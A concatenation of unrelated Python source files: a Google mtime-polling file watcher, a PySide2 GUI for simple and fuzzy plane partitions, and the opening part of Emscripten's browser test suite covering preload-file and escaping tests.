def is_server_launched():
global SERVER_LAUNCHED
return SERVER_LAUNCHED
|
mtime_file_watcher.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Monitors a directory tree for changes using mtime polling."""
import os
import threading
import warnings
class MtimeFileWatcher(object):
"""Monitors a directory tree for changes using mtime polling."""
def __init__(self, directory):
self._directory = directory
self._quit_event = threading.Event()
self._filename_to_mtime = None
self._has_changes = False
self._has_changes_lock = threading.Lock()
self._watcher_thread = threading.Thread(target=self._watch_changes)
self._watcher_thread.daemon = True
def start(self):
"""Start watching a directory for changes."""
self._watcher_thread.start()
def quit(self):
"""Stop watching a directory for changes."""
self._quit_event.set()
def has_changes(self):
"""Returns True if the watched directory has changed since the last call.
start() must be called before this method.
Returns:
Returns True if the watched directory has changed since the last call to
has_changes or, if has_changes has never been called, since start was
called.
"""
with self._has_changes_lock:
has_changes = self._has_changes
self._has_changes = False
return has_changes
def _watch_changes(self):
while not self._quit_event.wait(1):
self._check_for_changes()
def _check_for_changes(self):
if self._has_changed_paths():
with self._has_changes_lock:
self._has_changes = True
def _has_changed_paths(self):
self._filename_to_mtime, old_filename_to_mtime = (
self._generate_filename_to_mtime(), self._filename_to_mtime)
return (old_filename_to_mtime is not None and
self._filename_to_mtime != old_filename_to_mtime)
def _generate_filename_to_mtime(self):
filename_to_mtime = {}
num_files = 0
for dirname, dirnames, filenames in os.walk(self._directory,
followlinks=True):
for filename in filenames + dirnames:
if num_files == 10000:
warnings.warn(
'There are too many files in your application for '
'changes in all of them to be monitored. You may have to '
'restart the development server to see some changes to your '
'files.')
return filename_to_mtime
num_files += 1
path = os.path.join(dirname, filename)
try:
mtime = os.path.getmtime(path)
except (IOError, OSError):
pass
else:
filename_to_mtime[path] = mtime
return filename_to_mtime
|
main.py
|
import sys
from threading import Thread
from PySide2.QtWidgets import (QApplication, QPushButton, QMainWindow, QWidget, QVBoxLayout,
QHBoxLayout, QLabel, QLineEdit, QComboBox, QSplitter, QSpacerItem, QSizePolicy, QGraphicsView, QGraphicsScene)
from PySide2.QtCore import Slot, Qt, QRectF, QRect, Signal
from PySide2.QtGui import QPen, QBrush
from utils.cell import Cell
from utils.color_manager import ColorManager
from partition.partition_utils import (EuclidianDistance, ChebyshevDistance, TaxicabDistance, sign,
MonotonicStepFunction, ConstantStepFunction, SeriesStepFunction, LeftRectangularIntergate)
from partition.partition import ( FuzzyPartitionWithFixedCentersAlgorithm, SimplePartitionWithFixedCentersAlgorithm)
WINDOW_SIZE = 500
class SettingsWidget(QWidget):
def __init__(self, boardWidget, *args, **kwargs):
super().__init__(*args, **kwargs)
self._boardWidget = boardWidget
self._freeCoefficients = dict()
self._layout = self._buildSettingsLayout()
self._layout.setAlignment(Qt.AlignTop)
self.setLayout(self._layout)
@Slot()
def _onAddCenterButtonClicked(self):
if not self._xCoordinateInput.text() or not self._yCoordinateInput.text():
return
x = round(float(self._xCoordinateInput.text()) * WINDOW_SIZE)
y = round(float(self._yCoordinateInput.text()) * WINDOW_SIZE)
wasAdded = self._boardWidget.addCenter(x, y)
if not wasAdded:
return
freeCoeficientsLabel = QLabel(text='a<sub>i</sub> ({:3.3f}, {:3.3f}): '.format(
x / WINDOW_SIZE, y / WINDOW_SIZE))
self._freeCoeficientsInput = QLineEdit()
self._freeCoeficientsInput.setPlaceholderText('0')
freeCoeficientsLayout = QHBoxLayout()
freeCoeficientsLayout.addWidget(freeCoeficientsLabel)
freeCoeficientsLayout.addWidget(self._freeCoeficientsInput)
self._layout.addLayout(freeCoeficientsLayout)
self._freeCoefficients[(x, y)] = self._freeCoeficientsInput
@Slot()
def _activateFuzzyInput(self, newText):
allControls = [
self._confidenceInput,
self._precisionInput,
self._xCoordinateInput,
self._yCoordinateInput,
self._addCenterButton,
]
activator = {
'simple partition': [self._xCoordinateInput, self._yCoordinateInput, self._addCenterButton],
'fuzzy partition': [self._confidenceInput, self._precisionInput, self._xCoordinateInput, self._yCoordinateInput, self._addCenterButton,]
}
for item in activator:
if item == newText.lower():
for control in allControls:
control.setEnabled(control in activator[item])
def _buildSettingsLayout(self):
#------------------------------------Distance options------------------------------------#
self._distanceOptions = QComboBox()
self._distanceOptions.addItems(['Euclidian Distance', 'Chebyshev Distance', 'Taxicab Distance'])
distanceLayout = QVBoxLayout()
distanceLayout.addWidget(self._distanceOptions)
#----------------------------------------------------------------------------------------#
#------------------------------------Partition options------------------------------------#
self._partitionOptions = QComboBox()
self._partitionOptions.addItems(['Simple Partition', 'Fuzzy Partition'])
partitionLayout = QVBoxLayout()
partitionLayout.addWidget(self._partitionOptions)
self._partitionOptions.currentTextChanged.connect(self._activateFuzzyInput)
#-----------------------------------------------------------------------------------------#
#------------------------------------Confidence Degree------------------------------------#
self._confidenceInput = QLineEdit(enabled=True)
self._confidenceInput.setPlaceholderText('Confidence degree')
confidenceLayout = QVBoxLayout()
confidenceLayout.addWidget(self._confidenceInput)
self._precisionInput = QLineEdit(enabled=True)
self._precisionInput.setPlaceholderText('Gradient method precision')
precisionLayout = QVBoxLayout()
precisionLayout.addWidget(self._precisionInput)
#-----------------------------------------------------------------------------------------#
#------------------------------------Add center------------------------------------#
self._xCoordinateInput = QLineEdit()
self._xCoordinateInput.setPlaceholderText('x center coordinate')
self._yCoordinateInput = QLineEdit()
self._yCoordinateInput.setPlaceholderText('y center coordinate')
self._addCenterButton = QPushButton()
self._addCenterButton.setText('Add new center')
self._addCenterButton.setMinimumWidth(400)
addCentersLayout = QVBoxLayout()
addCentersLayout.addWidget(self._xCoordinateInput)
addCentersLayout.addWidget(self._yCoordinateInput)
addCentersLayout.addWidget(self._addCenterButton)
self._addCenterButton.clicked.connect(self._onAddCenterButtonClicked)
#-----------------------------------------------------------------------------------#
spacer = QSpacerItem(40, 40, QSizePolicy.Expanding, QSizePolicy.Minimum)
settingsLayout = QVBoxLayout()
settingsLayout.addLayout(partitionLayout)
settingsLayout.addLayout(distanceLayout)
settingsLayout.addLayout(confidenceLayout)
settingsLayout.addLayout(precisionLayout)
settingsLayout.addItem(spacer)
settingsLayout.addLayout(addCentersLayout)
return settingsLayout
def distance(self):
returnDistance = EuclidianDistance
if 'euclidian' in self._distanceOptions.currentText().lower():
returnDistance = EuclidianDistance
elif 'cheb' in self._distanceOptions.currentText().lower():
returnDistance = ChebyshevDistance
elif 'taxi' in self._distanceOptions.currentText().lower():
returnDistance = TaxicabDistance
return returnDistance
def partitionAlgorithm(self):
return self._partitionOptions.currentText().lower()
def precision(self):
return float(self._precisionInput.text()) if self._precisionInput.text() else 0.01
def confidence(self):
return float(self._confidenceInput.text()) if self._confidenceInput.text() else 0.0
def freeCoefficients(self):
return { center: float(freeCoefficient.text()) * WINDOW_SIZE
if freeCoefficient.text() else 0.0 for center, freeCoefficient in self._freeCoefficients.items() }
class PartitionCentralWidget(QWidget):
def __init__(self, boardWidget, settingsWidget, *args, **kwargs):
super().__init__(*args, **kwargs)
self._boardWidget = boardWidget
self._settingsWidget = settingsWidget
self._startPartitionButton = QPushButton('Start Partition')
self._paintGrayScale = QPushButton('Paint as grayscale')
self._paintGrayScale.setEnabled(False)
self._startPartitionButton.clicked.connect(self._onStartPartitionButtonClicked)
self._paintGrayScale.clicked.connect(self._onPaintGrayScaleButtonClicked)
self._splitter = QSplitter(Qt.Horizontal)
self._splitter.addWidget(self._boardWidget)
self._splitter.addWidget(self._settingsWidget)
mainLayout = QVBoxLayout()
mainLayout.addWidget(self._splitter)
mainLayout.addWidget(self._startPartitionButton)
mainLayout.addWidget(self._paintGrayScale)
self.setLayout(mainLayout)
@Slot()
def _onStartPartitionButtonClicked(self):
self._startPartitionButton.setEnabled(False)
partitionAlgorithm = self._settingsWidget.partitionAlgorithm()
if 'simple' in partitionAlgorithm.lower():
self._boardWidget.startSimplePartition(
self._settingsWidget.distance(), self._settingsWidget.freeCoefficients())
else:
self._boardWidget.startFuzzyPartition(
self._settingsWidget.distance(),
self._settingsWidget.confidence(),
self._settingsWidget.freeCoefficients(),
self._settingsWidget.precision())
self._startPartitionButton.setEnabled(True)
self._paintGrayScale.setEnabled(True)
@Slot()
def _onPaintGrayScaleButtonClicked(self):
self._paintGrayScale.setEnabled(False)
self._startPartitionButton.setEnabled(False)
self._boardWidget.toGrayScale()
self._startPartitionButton.setEnabled(True)
class BoardWidget(QGraphicsView):
CELL_CENTER_COLOR = Qt.black
CELL_SIMPLE_COLOR = Qt.white
CELL_SIMPLE_GRAY_COLOR = Qt.gray
CELL_BOUNDS_COLOR = Qt.black
update_progress = Signal(object)
def __init__(self, size, cellSize, application, *args, **kwargs):
super().__init__(*args, **kwargs)
self._application = application
self._windowSize = size
self._cellSize = cellSize
self._board = dict()
self._colors = dict()
self._scene = QGraphicsScene()
self.setScene(self._scene)
self.setViewportUpdateMode(QGraphicsView.FullViewportUpdate)
self.setFixedSize(self._windowSize * 1.05, self._windowSize * 1.05)
self.update_progress.connect(self.updateProgress)
for cellX in range(0, self._windowSize, self._cellSize):
for cellY in range(0, self._windowSize, self._cellSize):
self._board[(cellX, cellY)] = Cell(color=self.CELL_SIMPLE_COLOR)
self.updateColorAt((cellX, cellY))
def updateColorAt(self, point):
rect = QRectF(point[0], point[1], self._cellSize, self._cellSize)
self._scene.invalidate(rect)
self._scene.addRect(rect, QPen(Qt.black), QBrush(self._board[point].color))
def addCenter(self, x, y):
if (x, y) in self._board.keys():
cell = self._board[(x, y)]
if cell.isCenter:
return False
cell.isCenter = True
cell.color = self.CELL_CENTER_COLOR
self.updateColorAt((x, y))
return True
return False
def getExtraneousAdjecements(self, x, y):
adjecements = []
if (x < self._cellSize or x + self._cellSize >= self._windowSize):
return adjecements
if (y < self._cellSize or y + self._cellSize >= self._windowSize):
return adjecements
if (self._board[(x, y)].color == self.CELL_BOUNDS_COLOR):
return adjecements
checkedColor = self._board[(x, y)].color
for xDelta in [0, self._cellSize, -self._cellSize]:
for yDelta in [0, self._cellSize, -self._cellSize]:
candidate = self._board[(x + xDelta, y + yDelta)];
if (candidate.previousColor != checkedColor and candidate.color != self.CELL_BOUNDS_COLOR):
adjecements.append((x + xDelta, y + yDelta))
return adjecements
def forEachPoint(self, callback):
for x in range(0, self._windowSize, self._cellSize):
for y in range(0, self._windowSize, self._cellSize):
callback(x, y)
def savePrevColorAndGrayifyNeutralCells(self, x, y):
self._board[(x, y)].previousColor = self._board[(x, y)].color
if (self._board[(x, y)].color == self.CELL_SIMPLE_COLOR):
self._board[(x, y)].color = self.CELL_SIMPLE_GRAY_COLOR
self.updateColorAt((x, y))
def markBoundsAsBlack(self, x, y):
adjecements = self.getExtraneousAdjecements(x, y)
for point in adjecements:
if (self._board[point].color != self.CELL_SIMPLE_GRAY_COLOR):
self._board[point].color = self.CELL_BOUNDS_COLOR
self.updateColorAt(point)
def markRelatedPointAsWhite(self, x, y):
if (self._board[(x, y)].color != self.CELL_SIMPLE_GRAY_COLOR and self._board[(x, y)].color != self.CELL_BOUNDS_COLOR):
self._board[(x, y)].color = self.CELL_SIMPLE_COLOR
self.updateColorAt((x, y))
def toGrayScale(self):
self.forEachPoint(self.savePrevColorAndGrayifyNeutralCells)
self.forEachPoint(self.markBoundsAsBlack)
self.forEachPoint(self.markRelatedPointAsWhite)
@Slot(object)
def updateProgress(self, object):
point = object[0]
center = object[1]
if center:
self._board[point].color = self._colors[center]
self.updateColorAt(point)
def pointCalculatedCallback(self, point, center):
self.update_progress.emit((point, center))
def startSimplePartition(self, distance, freeCoefficients):
self._clearBoard()
centers = [ point for point in self._board.keys() if self._board[point].isCenter]
board = [ point for point in self._board.keys()]
partition = SimplePartitionWithFixedCentersAlgorithm(
board, centers, freeCoefficients, distance, self.pointCalculatedCallback)
self._colors = dict(zip(centers, ColorManager.GetRandomColors(len(centers))))
thread = Thread(target = partition.calculatePartition)
thread.start()
def startFuzzyPartition(self, distance, confidenceDeegre, freeCoefficients, precision):
self._clearBoard()
centers = [ point for point in self._board.keys() if self._board[point].isCenter]
board = [ point for point in self._board.keys()]
partition = FuzzyPartitionWithFixedCentersAlgorithm(
board, centers, SeriesStepFunction(25), confidenceDeegre, freeCoefficients, distance, self.pointCalculatedCallback, precision)
self._colors = dict(zip(centers, ColorManager.GetRandomColors(len(centers))))
thread = Thread(target = partition.calculatePartition)
thread.start()
def _clearBoard(self):
for point, cell in self._board.items():
if not cell.isCenter:
cell.color = self.CELL_SIMPLE_COLOR
self.updateColorAt(point)
if __name__ == '__main__':
application = QApplication(sys.argv)
mainWindow = QMainWindow()
mainWindow.setWindowTitle('Partition')
boardWidget = BoardWidget(WINDOW_SIZE, 5, application)
settingsWidget = SettingsWidget(boardWidget)
centralWidget = PartitionCentralWidget(boardWidget, settingsWidget)
mainWindow.setCentralWidget(centralWidget)
mainWindow.show()
sys.exit(application.exec_())
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, require_v8
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL', '-s', 'EXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
create_file('.somefile.txt', 'load me right before running the code please')
create_file('some@file.txt', 'load me right before running the code please')
absolute_src_path = os.path.abspath('somefile.txt')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
# TODO: change this when wasmfs supports relative paths.
if self.get_setting('WASMFS'):
path = "/" + path
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath])
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
create_file(tricky_filename, 'load me right before running the code please')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')])
# TODO: WASMFS doesn't support the rest of this test yet. Exit early.
if self.get_setting('WASMFS'):
return
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path])
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
f = fopen("%s", "r");
assert(f != NULL);
fclose(f);
f = fopen("%s", "r");
assert(f == NULL);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*'])
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY)
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins'])
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
@parameterized({
'default': ([],),
'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],),
})
@requires_threads
def test_preload_file_with_manual_data_download(self, args):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args)
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
# Move .data file out of server root to ensure that getPreloadedPackage is actually used
os.mkdir('test')
shutil.move('manual_download_data.data', 'test/manual_download_data.data')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by
# correctly escaping the names.
def test_output_file_escaping(self):
self.set_setting('EXIT_RUNTIME')
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.abspath(d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
create_file(os.path.join(d, txt), 'load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
create_file(cpp, r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
abs_txt = os.path.join(abs_d, txt)
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.abspath(page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY)
self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0')
@parameterized({
'0': (0,),
'1mb': (1 * 1024 * 1024,),
'100mb': (100 * 1024 * 1024,),
'150mb': (150 * 1024 * 1024,),
})
def test_preload_caching(self, extra_size):
self.set_setting('EXIT_RUNTIME')
create_file('main.c', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern int checkPreloadResults();
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return checkPreloadResults();
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
if is_chrome() and extra_size >= 100 * 1024 * 1024:
self.skipTest('chrome bug')
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
